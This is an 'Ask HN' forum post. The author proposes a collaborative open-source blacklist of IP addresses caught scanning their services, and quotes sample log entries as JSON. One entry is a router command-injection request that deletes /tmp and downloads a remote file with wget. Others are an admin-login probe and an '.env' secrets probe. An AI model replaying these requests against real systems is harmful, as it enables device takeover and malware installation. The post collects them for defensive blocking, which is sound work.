New ask Hacker News story: Ask HN: Can we collaborate on a IP Address blacklist?

Ask HN: Can we collaborate on a IP Address blacklist?
2 by usernamebias | 3 comments on Hacker News.
Hear me out. I've recently started logging pings to my services, A LOT of servers ping me constantly checking for things like '.env' and other known vulnerabilities. I currently have a JSON dataset of about 10K entries. It looks like this. { "offense": "boaform/admin/formLogin?username=ec8&psd=ec8", "ipAddress": "125.47.68.164" }, { "offense": ".env", "ipAddress": "52.224.55.198" }, { "offense": "setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/ ;wget+https://ift.tt/3wziuvW", "ipAddress": "115.58.115.18" } Would the world be a better place if we all collaborated on an Open Source blacklist of IP Addresses trying to do sketchy sh t at our doors? Like a 'ad blocklist' for SaaS. Or kindly point me to a Github of an existing project.